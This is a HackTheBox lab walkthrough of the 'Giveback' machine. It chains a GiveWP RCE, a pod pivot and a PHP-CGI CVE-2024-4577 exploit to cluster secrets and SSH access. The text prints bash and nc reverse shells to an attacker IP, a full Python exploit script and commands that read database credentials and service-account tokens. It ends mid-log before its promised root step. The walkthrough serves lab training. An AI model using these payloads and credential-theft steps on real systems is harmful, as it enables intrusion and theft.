
HTB — Giveback

A WordPress site running an outdated GiveWP plugin (CVE-2024-5932) gives a shell inside a Kubernetes pod. Pivoting through that pod reaches an internal legacy PHP-CGI service vulnerable to CVE-2024-4577, which yields root in a second pod whose service-account token can list cluster secrets — including the SSH password for `babywyrm`. On the host, a sudo-able `/opt/debug` wrapper around runc accepts a user-supplied bundle, so a config with `root.path` set to `/` spawns a root shell.

November 8, 2025HackTheBox
#WordPress#GiveWP#Kubernetes#PHP-CGI#runc

nmap — 6443 and 10250 are filtered from the outside, but 30686 (NodePort range) answers with kube-proxy-style health JSON (`serviceProxyHealthy`, `wp-nginx-service`), so the WordPress host is a Kubernetes node; 6443 is later confirmed as the API server (`serverAddress: 10.10.11.94:6443`).

sh
nmap -sV -sC -p- -Pn 10.10.11.94 -oN nmap                                                                                                           130
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-05 16:26 EST
Nmap scan report for 10.10.11.94
Host is up (0.042s latency).
Not shown: 65530 closed tcp ports (reset)
PORT      STATE    SERVICE      VERSION
22/tcp    open     ssh          OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 66:f8:9c:58:f4:b8:59:bd:cd:ec:92:24:c3:97:8e:9e (ECDSA)
|_  256 96:31:8a:82:1a:65:9f:0a:a2:6c:ff:4d:44:7c:d3:94 (ED25519)
80/tcp    open     http         nginx 1.28.0
|_http-server-header: nginx/1.28.0
|_http-title: GIVING BACK IS WHAT MATTERS MOST – OBVI
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-generator: WordPress 6.8.1
6443/tcp  filtered sun-sr-https
10250/tcp filtered unknown
30686/tcp open     unknown
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 200 OK
|     Content-Type: application/json
|     X-Content-Type-Options: nosniff
|     X-Load-Balancing-Endpoint-Weight: 1
|     Date: Wed, 05 Nov 2025 21:26:44 GMT
|     Content-Length: 127
|     "service": {
|     "namespace": "default",
|     "name": "wp-nginx-service"
|     "localEndpoints": 1,
|     "serviceProxyHealthy": true
|   GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest, HTTPOptions: 
|     HTTP/1.0 200 OK
|     Content-Type: application/json
|     X-Content-Type-Options: nosniff
|     X-Load-Balancing-Endpoint-Weight: 1
|     Date: Wed, 05 Nov 2025 21:26:19 GMT
|     Content-Length: 127
|     "service": {
|     "namespace": "default",
|     "name": "wp-nginx-service"
|     "localEndpoints": 1,
|_    "serviceProxyHealthy": true
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
 

wpscan

sh
sudo wpscan -e ap -t 500 --url http://10.10.11.94 --api-token <WPSCAN_API_TOKEN>   # token redacted: never publish a live API token in a writeup
sh
[+] give
 | Location: http://10.10.11.94/wp-content/plugins/give/
 | Last Updated: 2025-11-05T14:00:00.000Z
 | [!] The version is out of date, the latest version is 4.13.0
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By:
 |  Urls In 404 Page (Passive Detection)
 |  Meta Tag (Passive Detection)
 |  Javascript Var (Passive Detection)

sh
pip3 install -r requirements.txt --break-system-packages
  • http://giveback.htb/donations/the-things-we-need/
sh
python3 CVE-2024-5932-rce.py -u http://giveback.htb/donations/the-things-we-need/ -c 'ping 10.10.14.10'
sh
, length 0
16:49:45.900872 IP giveback.htb.http > 10.10.14.10.60248: Flags [F.], seq 8377, ack 195, win 501, options [nop,nop,TS val 1699612084 ecr 3504984991], length 0
16:49:45.900899 IP 10.10.14.10.60248 > giveback.htb.http: Flags [.], ack 8378, win 569, options [nop,nop,TS val 3504985008 ecr 1699612084], length 0
16:49:45.906428 IP giveback.htb.http > 10.10.14.10.60264: Flags [S.], seq 2485002235, ack 1135454812, win 64308, options [mss 1362,sackOK,TS val 1699612090 ecr 3504984998,nop,wscale 7], length 0
16:49:45.906482 IP 10.10.14.10.60264 > giveback.htb.http: Flags [.], ack 1, win 502, options [nop,nop,TS val 3504985014 ecr 1699612090], length 0
16:49:45.906559 IP 10.10.14.10.60264 > giveback.htb.http: Flags [P.], seq 1:325, ack 1, win 502, options [nop,nop,TS val 3504985014 ecr 1699612090], length 324: HTTP: POST /wp-admin/admin-ajax.php HTTP/1.1
16:49:45.906571 IP 10.10.14.10.60264 > giveback.htb.http: Flags [P.], seq 325:1357, ack 1, win 502, options [nop,nop,TS val 3504985014 ecr 1699612090], length 1032: HTTP
16:49:45.922216 IP giveback.htb.http > 10.10.14.10.60264: Flags [.], ack 325, win 501, options [nop,nop,TS val 1699612106 ecr 3504985014], length 0
16:49:45.922235 IP giveback.htb.http > 10.10.14.10.60264: Flags [.], ack 1357, win 501, options [nop,nop,TS val 1699612106 ecr 3504985014], length 0
16:49:46.041422 IP giveback.htb.http > 10.10.14.10.60264: Flags [P.], seq 1:981, ack 1357, win 501, options [nop,nop,TS val 1699612224 ecr 3504985014], length 980: HTTP: HTTP/1.1 500 Internal Server Error
16:49:46.041466 IP 10.10.14.10.60264 > giveback.htb.http: Flags [.], ack 981, win 495, options [nop,nop,TS val 3504985149 ecr 1699612224], length 0
16:49:46.042143 IP 10.10.14.10.60264 > giveback.htb.http: Flags [F.], seq 1357, ack 981, win 495, options [nop,nop,TS val 3504985149 ecr 1699612224], length 0
16:49:46.057636 IP giveback.htb.http > 10.10.14.10.60264: Flags [F.], seq 981, ack 1358, win 501, options [nop,nop,TS val 1699612241 ecr 3504985149], length 0
16:49:46.057656 IP 10.10.14.10.60264 > giveback.htb.http: Flags [.], ack 982, win 495, options [nop,nop,TS val 3504985165 ecr 1699612241], length 0

reverse shell

sh
python3 CVE-2024-5932-rce.py -u http://giveback.htb/donations/the-things-we-need/ -c "bash -c 'bash -i >& /dev/tcp/10.10.14.10/80 0>&1'"
sh
rlwrap nc -lnvp 80
Listening on 0.0.0.0 80
Connection received on 10.10.11.94 1553
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
<-68dc7dc988-s8g7m:/opt/bitnami/wordpress/wp-admin$ whoami
whoami
whoami: cannot find name for user ID 1001
<-68dc7dc988-s8g7m:/opt/bitnami/wordpress/wp-admin$ id
id
uid=1001 gid=0(root) groups=0(root),1001
php — excerpt of wp-config.php read from the WordPress pod (the DB credentials are reused below against `beta-vino-wp-mariadb`)
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'bitnami_wordpress' );
 
/** Database username */
define( 'DB_USER', 'bn_wordpress' );
 
/** Database password */
define( 'DB_PASSWORD', 'sW5sp4spa3u7RLyetrekE4oS' );
 
/** Database hostname */
define( 'DB_HOST', 'beta-vino-wp-mariadb:3306' );
 
 

Connection syntax used below: `mysql -u <user> -p<password> -h <FQDN/IP>`. Passing the password inline after `-p` exposes it to `ps` and to the shell history on the pod; a bare `-p` (interactive prompt) or `MYSQL_PWD` in the environment avoids the argv leak.

database

  • show databases
sh
/opt/bitnami/mysql/bin/mariadb -u bn_wordpress -p'sW5sp4spa3u7RLyetrekE4oS' -h beta-vino-wp-mariadb -P 3306 -e "SHOW DATABASES;"
Database
bitnami_wordpress
information_schema
  • show tables
sh
<p-wordpress-68dc7dc988-s8g7m:/opt/bitnami/scripts$ /opt/bitnami/mysql/bin/mariadb -u bn_wordpress -p'sW5sp4spa3u7RLyetrekE4oS' -h beta-vino-wp-mariadb -P 3306 -e "use bitnami_wordpress; show tables;"
<db -P 3306 -e "use bitnami_wordpress; show tables;"
Tables_in_bitnami_wordpress
wp_actionscheduler_actions
wp_actionscheduler_claims
wp_actionscheduler_groups
wp_actionscheduler_logs
wp_aioseo_cache
wp_commentmeta
wp_comments
wp_give_commentmeta
wp_give_comments
wp_give_donationmeta
wp_give_donormeta
wp_give_donors
wp_give_formmeta
wp_give_log
wp_give_migrations
wp_give_revenue
wp_give_sequential_ordering
wp_give_sessions
wp_give_subscriptionmeta
wp_give_subscriptions
wp_links
wp_options
wp_postmeta
wp_posts
wp_term_relationships
wp_term_taxonomy
wp_termmeta
wp_terms
wp_usermeta
wp_users
sh
<p-wordpress-68dc7dc988-s8g7m:/opt/bitnami/scripts$ /opt/bitnami/mysql/bin/mariadb -u bn_wordpress -p'sW5sp4spa3u7RLyetrekE4oS' -h beta-vino-wp-mariadb -P 3306 -e "use bitnami_wordpress; select * from wp_users;"
<-e "use bitnami_wordpress; select * from wp_users;"
ID	user_login	user_pass	user_nicename	user_email	user_url	user_registered	user_activation_key	user_status	display_name
1	user	$wp$2y$10$a6fY4Ww3s.qVvLn0DM.LM.2KPy0ptIz/NWpvZAVUf7SMD.tx2KpMG	user	user@example.com	http://127.0.0.1	2024-09-21 22:18:28	0babywyrm

chisel

  • transfer chisel to the target machine with php
sh
I have no name!@beta-vino-wp-wordpress-68dc7dc988-s8g7m:/tmp$ php -r 'file_put_contents("/tmp/chisel", file_get_contents("http://10.10.14.10:8000/chisel"));'
<e_get_contents("http://10.10.14.10:8000/chisel"));'
  • start server
sh
./chisel server --reverse --port 1234
  • chisel client (SOCKS proxy back to the attacker; the internal CMS at 10.43.2.241:5000 probed next is a cluster-internal address — how it was enumerated is not shown here)
sh
I have no name!@beta-vino-wp-wordpress-68dc7dc988-s8g7m:/tmp$ ./chisel client -v 10.10.14.10:1234 socks
sh
<-68dc7dc988-s8g7m:/opt/bitnami/wordpress/wp-admin$ php -r 'echo @file_get_contents("http://10.43.2.241:5000");' | sed -n '1,200p'
<ents("http://10.43.2.241:5000");' | sed -n '1,200p'
<!DOCTYPE html>
<html>
<head>
  <title>GiveBack LLC Internal CMS</title>
  <!-- Developer note: phpinfo accessible via debug mode during migration window -->
  <style>
    body { font-family: Arial, sans-serif; margin: 40px; background: #f9f9f9; }
    .header { color: #333; border-bottom: 1px solid #ccc; padding-bottom: 10px; }
    .info { background: #eef; padding: 15px; margin: 20px 0; border-radius: 5px; }
    .warning { background: #fff3cd; border: 1px solid #ffeeba; padding: 10px; margin: 10px 0; }
    .resources { margin: 20px 0; }
    .resources li { margin: 5px 0; }
    a { color: #007bff; text-decoration: none; }
    a:hover { text-decoration: underline; }
  </style>
</head>
<body>
  <div class="header">
    <h1>🏢 GiveBack LLC Internal CMS System</h1>
    <p><em>Development Environment – Internal Use Only</em></p>
  </div>
 
  <div class="warning">
    <h4>⚠️ Legacy Notice</h4>
    <p>**SRE** - This system still includes legacy CGI support. Cluster misconfiguration may likely expose internal scripts.</p>
  </div>
 
  <div class="resources">
    <h3>Internal Resources</h3>
    <ul>
      <li><a href="/admin/">/admin/</a> — VPN Required</li>
      <li><a href="/backups/">/backups/</a> — VPN Required</li>
      <li><a href="/runbooks/">/runbooks/</a> — VPN Required</li>
      <li><a href="/legacy-docs/">/legacy-docs/</a> — VPN Required</li>
      <li><a href="/debug/">/debug/</a> — Disabled</li>
      <li><a href="/cgi-bin/info">/cgi-bin/info</a> — CGI Diagnostics</li>
      <li><a href="/cgi-bin/php-cgi">/cgi-bin/php-cgi</a> — PHP-CGI Handler</li>
      <li><a href="/phpinfo.php">/phpinfo.php</a></li>
      <li><a href="/robots.txt">/robots.txt</a> — Crawlers: Disallowed</li>
    </ul>
  </div>
 
  <div class="info">
    <h3>Developer Note</h3>
    <p>This CMS was originally deployed on Windows IIS using <code>php-cgi.exe</code>.
    During migration to Linux, the Windows-style CGI handling was retained to ensure
    legacy scripts continued to function without modification.</p>
  </div>
</body>
</html>
<-68dc7dc988-s8g7m:/opt/bitnami/wordpress/wp-admin$ 
 

ligolo

sh
I have no name!@beta-vino-wp-wordpress-68dc7dc988-s8g7m:/tmp$ php -r 'file_put_contents("/tmp/agent", file_get_contents("http://10.10.14.10:8000/agent"));'
sh
sudo ip tuntap add user sake mode tun ligolo
sudo ip link set ligolo up
sh
./proxy -selfcert                                                                                                                                     1
INFO[0000] Loading configuration file ligolo-ng.yaml    
WARN[0000] daemon configuration file not found. Creating a new one... 
? Enable Ligolo-ng WebUI? No
WARN[0006] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC! 
ERRO[0006] Certificate cache error: acme/autocert: certificate cache miss, returning a new certificate 
INFO[0006] Listening on 0.0.0.0:11601           
sh
I have no name!@beta-vino-wp-wordpress-68dc7dc988-s8g7m:/tmp$ ./agent -connect 10.10.14.10:11601 -ignore-cert
sh
ligolo-ng » session
? Specify a session : 1 - Unknown@beta-vino-wp-wordpress-68dc7dc988-s8g7m - 10.10.11.94:5779 - 66175bf4fc34
[Agent : Unknown@beta-vino-wp-wordpress-68dc7dc988-s8g7m] » start
sh
sudo ip route add 10.43.2.0/24 dev ligolo

  • https://github.com/watchtowrlabs/CVE-2024-4577
sh
curl -si http://10.43.2.241:5000/cgi-bin/php-cgi
 
HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Thu, 06 Nov 2025 23:08:42 GMT
Content-Type: text/plain;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.3.3
 
OK#
  • modified the exploit since the original PoC targets Windows: CVE-2024-4577 relies on the Windows best-fit mapping of the soft hyphen (`%AD`) to `-`, and it works against this Linux pod only because the handler retained the Windows-style CGI argument handling described in the CMS developer note above. The listing below is the trimmed loop; the `[START]`/`[END]` markers in the transcript come from the original PoC's PHP body, which this version omits.
python
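#!/usr/bin/env python3
"""Interactive pseudo-shell over CVE-2024-4577 (PHP-CGI argument injection).

The query string carries a soft hyphen (``%AD``) that the vulnerable handler
maps to ``-``, so the rest of the query is parsed as php-cgi command-line
flags: ``-d allow_url_include=1 -d auto_prepend_file=php://input``.  The POST
body is then executed as PHP before the requested script runs.

Only the standard library is used (no ``requests``), TLS verification is
disabled on purpose (lab targets with self-signed certs), and every request
has a timeout so a hung target does not wedge the loop.
"""
import argparse
import ssl
import sys
import urllib.error
import urllib.request

# Query suffix that turns the CGI handler into "php-cgi -d ... -d ...".
# Kept byte-identical to the PoC: %AD is the soft hyphen, %3d is '='.
QUERY = "?%ADd+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input"


def build_url(target):
    """Return the exploit URL for the php-cgi handler at ``target``."""
    return f"{target}{QUERY}"


def build_body(cmd):
    """Return the PHP that ``php://input`` prepends to the target script.

    ``cmd`` is placed in a single-quoted PHP string with backslashes and
    single quotes escaped, so quotes or backticks in the command cannot break
    out of the PHP literal (the original f-string with backticks could).  The
    ``[START]``/``[END]`` markers match the transcript output and make the
    command output easy to isolate from anything the target script prints.
    """
    escaped = cmd.replace("\\", "\\\\").replace("'", "\\'")
    return (
        "<?php echo '[START]'; echo shell_exec('" + escaped + "'); "
        "echo '[END]'; die(); ?>"
    )


def run_command(target, cmd, timeout=10):
    """POST ``cmd`` to ``target`` and return the stripped response body.

    Non-2xx responses are returned as well (their body usually still holds
    the command output); only transport errors propagate as URLError/OSError.
    """
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE  # lab target; equivalent of verify=False
    req = urllib.request.Request(
        build_url(target), data=build_body(cmd).encode(), method="POST"
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
            raw = resp.read()
    except urllib.error.HTTPError as err:
        raw = err.read()
    return raw.decode("utf-8", errors="replace").strip()


def main(argv=None):
    """Parse ``--target`` and run the read-eval loop until exit/quit/EOF."""
    parser = argparse.ArgumentParser(
        description="Interactive shell via CVE-2024-4577 (php-cgi argument injection)"
    )
    parser.add_argument(
        "--target", "-t", required=True, help="URL of the php-cgi handler"
    )
    args = parser.parse_args(argv)

    print("[+] Interactive Shell\n")
    while True:
        try:
            cmd = input("$ ")
        except EOFError:  # Ctrl-D: leave cleanly instead of a traceback
            break
        if cmd.lower() in ["exit", "quit"]:
            break
        if not cmd.strip():
            continue
        try:
            print(run_command(args.target, cmd))
        except (urllib.error.URLError, OSError) as exc:
            print(f"[-] request failed: {exc}", file=sys.stderr)


if __name__ == "__main__":
    main()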
  • we have an interactive webshell
sh
python3 watchTowr-vs-php_cve-2024-4577.py --target http://10.43.2.241:5000/cgi-bin/php-cgi
[+] Interactive Shell
 
$ id
[START]uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
[END]
 
  • full reverse shell (named-pipe `nc` one-liner sent through the webshell; `nc` is present in the php-cgi pod)
sh
$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 81 >/tmp/f
sh
rlwrap nc -lnvp 81 
Listening on 0.0.0.0 81
Connection received on 10.10.11.94 25349
/bin/sh: can't access tty; job control turned off
/var/www/html/cgi-bin # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

adm group

sh
/ # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
 

kubernetes secrets — the pod's mounted service-account token is tried against the in-cluster API. The boot log read later shows a `secret-reader` Role and a `legacy-cms-secret-reader` RoleBinding being applied, which presumably is what lets this pod's account list secrets in `default`.

sh
/run/secrets/kubernetes.io # cd /var/run/secrets/kubernetes.io/serviceaccount/
 
sh
/run/secrets/kubernetes.io/serviceaccount # env | grep -i kubernetes
 
KUBERNETES_PORT=tcp://10.43.0.1:443
KUBERNETES_SERVICE_PORT=443
OLDPWD=/var/run/secrets/kubernetes.io
KUBERNETES_PORT_443_TCP_ADDR=10.43.0.1
KUBERNETES_PORT_443_TCP_PORT=443
KUBERNETES_PORT_443_TCP_PROTO=tcp
KUBERNETES_SERVICE_PORT_HTTPS=443
KUBERNETES_PORT_443_TCP=tcp://10.43.0.1:443
KUBERNETES_SERVICE_HOST=10.43.0.1
PWD=/var/run/secrets/kubernetes.io/serviceaccount
sh
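# Service-account material the kubelet mounts into the pod; the same token is
# what in-cluster tooling would present to the API server. SA_DIR can be
# overridden for non-standard mounts.
SA_DIR="${SA_DIR:-/var/run/secrets/kubernetes.io/serviceaccount}"
TOKEN=$(cat "$SA_DIR/token")
NAMESPACE=$(cat "$SA_DIR/namespace")
# The in-cluster API address is published through the KUBERNETES_SERVICE_*
# env vars (see `env | grep -i kubernetes` above); fall back to the values
# observed on this box so the snippet still works if they are unset.
API_SERVER="https://${KUBERNETES_SERVICE_HOST:-10.43.0.1}:${KUBERNETES_SERVICE_PORT:-443}"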
sh
curl -k -H "Authorization: Bearer $TOKEN" "$API_SERVER/api"
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0{
  "kind": "APIVersions",
  "versions": [
    "v1"
  ],
  "serverAddressByClientCIDRs": [
    {
      "clientCIDR": "0.0.0.0/0",
      "serverAddress": "10.10.11.94:6443"
    }
  ]
 
sh
curl -k -s -H "Authorization: Bearer $TOKEN" "https://10.43.0.1:443/api/v1/namespaces/default/secrets"

password candidates (base64 `data` values taken from the secrets listing above, whose output is not reproduced here)

sh
echo "Current namespace: $NAMESPACE"
Current namespace: default
sh
curl -k -s -H "Authorization: Bearer $TOKEN" "https://10.43.0.1:443/api/v1/namespaces/default/secrets"
sh
echo "Y0hCVkk3aG1PVHAycnBqSTVoZEl5TEZ4bk5kWG55" | base64 -d
cHBVI7hmOTp2rpjI5hdIyLFxnNdXny
sh
echo "T2pGaTNhMXp3ZEVQOTdvbnZoUE1zZjR4eFo4TXdaeGU=" | base64 -d
OjFi3a1zwdEP97onvhPMsf4xxZ8MwZxe
sh
echo "TzhGN0tSNXpHaQ==" | base64 -d                                                                                                                   1
O8F7KR5zGi
sh
echo "QTU2bTg0d1JxbTJDY1VweE9KdFUyTzRHOG1nREV4" | base64 -d                                                                                         255
A56m84wRqm2CcUpxOJtU2O4G8mgDEx

ssh as babywyrm

sh
ssh babywyrm@10.10.11.94                                                                                                                            130 
babywyrm@10.10.11.94's password:  A56m84wRqm2CcUpxOJtU2O4G8mgDEx
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-124-generic x86_64)
 
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro
 
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
 
To restore this content, you can run the 'unminimize' command.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
 
Last login: Fri Nov 7 17:15:47 2025 from 10.10.14.10
babywyrm@giveback:~$ whoami
babywyrm
sh
babywyrm@giveback:~$ sudo -l
Matching Defaults entries for babywyrm on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty, timestamp_timeout=0,
    timestamp_timeout=20
 
User babywyrm may run the following commands on localhost:
    (ALL) NOPASSWD: !ALL
    (ALL) /opt/debug
 

user.txt

sh
babywyrm@giveback:~$ cat user.txt
a9cb14db...

privilege escalation

sh
╔══════════╣ Active Ports
 https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#open-ports
══╣ Active Ports (netstat)
tcp        0      0 127.0.0.1:10010         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:10249         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:10248         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:10257         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:10256         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:10259         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:10258         0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:6444          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::30686                :::*                    LISTEN      -                   
tcp6       0      0 :::6443                 :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::10250                :::*                    LISTEN      -                   
 
 
sh
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
 https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid
Matching Defaults entries for babywyrm on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty, timestamp_timeout=0, timestamp_timeout=20
 
User babywyrm may run the following commands on localhost:
    (ALL) NOPASSWD: !ALL
    (ALL) /opt/debug

adm group

sh
babywyrm@giveback:/opt$ id
uid=1000(babywyrm) gid=1000(babywyrm) groups=1000(babywyrm),4(adm),30(dip)

boot_script.log — readable as babywyrm (presumably via the adm group, see `id` above); each run logs the sealed MASTERPASS in clear text and then sets it as babywyrm's system password, so the last entry is the current SSH password (it matches the decoded secret A56m84wRqm2CcUpxOJtU2O4G8mgDEx).

sh
babywyrm@giveback:/var/log$ cat boot_script.log
sealedsecret.bitnami.com "user-secret-babywyrm" deleted
secret "user-secret-babywyrm" deleted
Error from server (NotFound): error when deleting "sealed-masterpass-secret.yaml": sealedsecrets.bitnami.com "masterpass-secret" not found
Deleting existing masterpass-secret...
Creating new masterpass-secret with value from /tmp/masterpass.txt
sealedsecret.bitnami.com/user-secret-babywyrm created
Creating new user-secret-sydneysweeney with random value
sealedsecret.bitnami.com/user-secret-sydneysweeney created
Creating new user-secret-margotrobbie with random value
sealedsecret.bitnami.com/user-secret-margotrobbie created
Applying updated YAML...
serviceaccount/secret-reader-sa unchanged
role.rbac.authorization.k8s.io/secret-reader unchanged
rolebinding.rbac.authorization.k8s.io/legacy-cms-secret-reader unchanged
Restarting the WordPress deployment...
deployment.apps/beta-vino-wp-wordpress restarted
Waiting for user-secret-babywyrm to be created by controller...
user-secret-babywyrm available after 2 seconds
Sealed MASTERPASS (from Kubernetes secret): 2rNCmALF2au2tfXzV9LZM7K1ihb4o
Local MASTERPASS (from temp file): 2rNCmALF2au2tfXzV9LZM7K1ihb4o
Setting password for 'babywyrm' on system...
Password for 'babywyrm' has been set successfully.
boot.sh completed successfully.
Warning: Immediate deletion does not wait for confirmation that the running resource has been terminated. The resource may continue to run on the cluster indefinitely.
pod "coredns-68d76bdc99-9t4l6" force deleted
sealedsecret.bitnami.com "user-secret-babywyrm" deleted
sealedsecret.bitnami.com "user-secret-margotrobbie" deleted
sealedsecret.bitnami.com "user-secret-sydneysweeney" deleted
secret "user-secret-babywyrm" deleted
Error from server (NotFound): error when deleting "sealed-masterpass-secret.yaml": sealedsecrets.bitnami.com "masterpass-secret" not found
Deleting existing masterpass-secret...
Creating new masterpass-secret with value from /tmp/masterpass.txt
sealedsecret.bitnami.com/user-secret-babywyrm created
user-secret-sydneysweeney already exists, skipping.
user-secret-margotrobbie already exists, skipping.
Applying updated YAML...
serviceaccount/secret-reader-sa unchanged
role.rbac.authorization.k8s.io/secret-reader unchanged
rolebinding.rbac.authorization.k8s.io/legacy-cms-secret-reader unchanged
Restarting the WordPress deployment...
deployment.apps/beta-vino-wp-wordpress restarted
Waiting for user-secret-babywyrm to be created by controller...
user-secret-babywyrm available after 2 seconds
Sealed MASTERPASS (from Kubernetes secret): Y5lEIn7oHzd0ZECzagbAOtr9zt4ffuW
Local MASTERPASS (from temp file): Y5lEIn7oHzd0ZECzagbAOtr9zt4ffuW
Setting password for 'babywyrm' on system...
Password for 'babywyrm' has been set successfully.
boot.sh completed successfully.
sealedsecret.bitnami.com "user-secret-babywyrm" deleted
secret "user-secret-babywyrm" deleted
Error from server (NotFound): error when deleting "sealed-masterpass-secret.yaml": sealedsecrets.bitnami.com "masterpass-secret" not found
Deleting existing masterpass-secret...
Creating new masterpass-secret with value from /tmp/masterpass.txt
sealedsecret.bitnami.com/user-secret-babywyrm created
Creating new user-secret-sydneysweeney with random value
sealedsecret.bitnami.com/user-secret-sydneysweeney created
Creating new user-secret-margotrobbie with random value
sealedsecret.bitnami.com/user-secret-margotrobbie created
Applying updated YAML...
serviceaccount/secret-reader-sa unchanged
role.rbac.authorization.k8s.io/secret-reader unchanged
rolebinding.rbac.authorization.k8s.io/legacy-cms-secret-reader unchanged
Restarting the WordPress deployment...
deployment.apps/beta-vino-wp-wordpress restarted
Waiting for user-secret-babywyrm to be created by controller...
user-secret-babywyrm available after 2 seconds
Sealed MASTERPASS (from Kubernetes secret): KliDbpcmnZGdrij2zXUf98VGGMpZYMQR
Local MASTERPASS (from temp file): KliDbpcmnZGdrij2zXUf98VGGMpZYMQR
Setting password for 'babywyrm' on system...
Password for 'babywyrm' has been set successfully.
boot.sh completed successfully.
sealedsecret.bitnami.com "user-secret-babywyrm" deleted
sealedsecret.bitnami.com "user-secret-margotrobbie" deleted
sealedsecret.bitnami.com "user-secret-sydneysweeney" deleted
secret "user-secret-babywyrm" deleted
Error from server (NotFound): error when deleting "sealed-masterpass-secret.yaml": sealedsecrets.bitnami.com "masterpass-secret" not found
Deleting existing masterpass-secret...
Creating new masterpass-secret with value from /tmp/masterpass.txt
sealedsecret.bitnami.com/user-secret-babywyrm created
user-secret-sydneysweeney already exists, skipping.
user-secret-margotrobbie already exists, skipping.
Applying updated YAML...
serviceaccount/secret-reader-sa unchanged
role.rbac.authorization.k8s.io/secret-reader unchanged
rolebinding.rbac.authorization.k8s.io/legacy-cms-secret-reader unchanged
Restarting the WordPress deployment...
deployment.apps/beta-vino-wp-wordpress restarted
Waiting for user-secret-babywyrm to be created by controller...
user-secret-babywyrm available after 2 seconds
Sealed MASTERPASS (from Kubernetes secret): Fgf1QwvYhtsSwHx6stWOd0yco5HG2SF
Local MASTERPASS (from temp file): Fgf1QwvYhtsSwHx6stWOd0yco5HG2SF
Setting password for 'babywyrm' on system...
Password for 'babywyrm' has been set successfully.
boot.sh completed successfully.
sealedsecret.bitnami.com "user-secret-babywyrm" deleted
secret "user-secret-babywyrm" deleted
Error from server (NotFound): error when deleting "sealed-masterpass-secret.yaml": sealedsecrets.bitnami.com "masterpass-secret" not found
Deleting existing masterpass-secret...
Creating new masterpass-secret with value from /tmp/masterpass.txt
sealedsecret.bitnami.com/user-secret-babywyrm created
Creating new user-secret-sydneysweeney with random value
sealedsecret.bitnami.com/user-secret-sydneysweeney created
Creating new user-secret-margotrobbie with random value
sealedsecret.bitnami.com/user-secret-margotrobbie created
Applying updated YAML...
serviceaccount/secret-reader-sa unchanged
role.rbac.authorization.k8s.io/secret-reader unchanged
rolebinding.rbac.authorization.k8s.io/legacy-cms-secret-reader unchanged
Restarting the WordPress deployment...
deployment.apps/beta-vino-wp-wordpress restarted
Waiting for user-secret-babywyrm to be created by controller...
user-secret-babywyrm available after 2 seconds
Sealed MASTERPASS (from Kubernetes secret): 1IRGZ6iLq9TXsONyrjoa87qtV5IGSw
Local MASTERPASS (from temp file): 1IRGZ6iLq9TXsONyrjoa87qtV5IGSw
Setting password for 'babywyrm' on system...
Password for 'babywyrm' has been set successfully.
boot.sh completed successfully.
sealedsecret.bitnami.com "user-secret-babywyrm" deleted
sealedsecret.bitnami.com "user-secret-margotrobbie" deleted
sealedsecret.bitnami.com "user-secret-sydneysweeney" deleted
secret "user-secret-babywyrm" deleted
Error from server (NotFound): error when deleting "sealed-masterpass-secret.yaml": sealedsecrets.bitnami.com "masterpass-secret" not found
Deleting existing masterpass-secret...
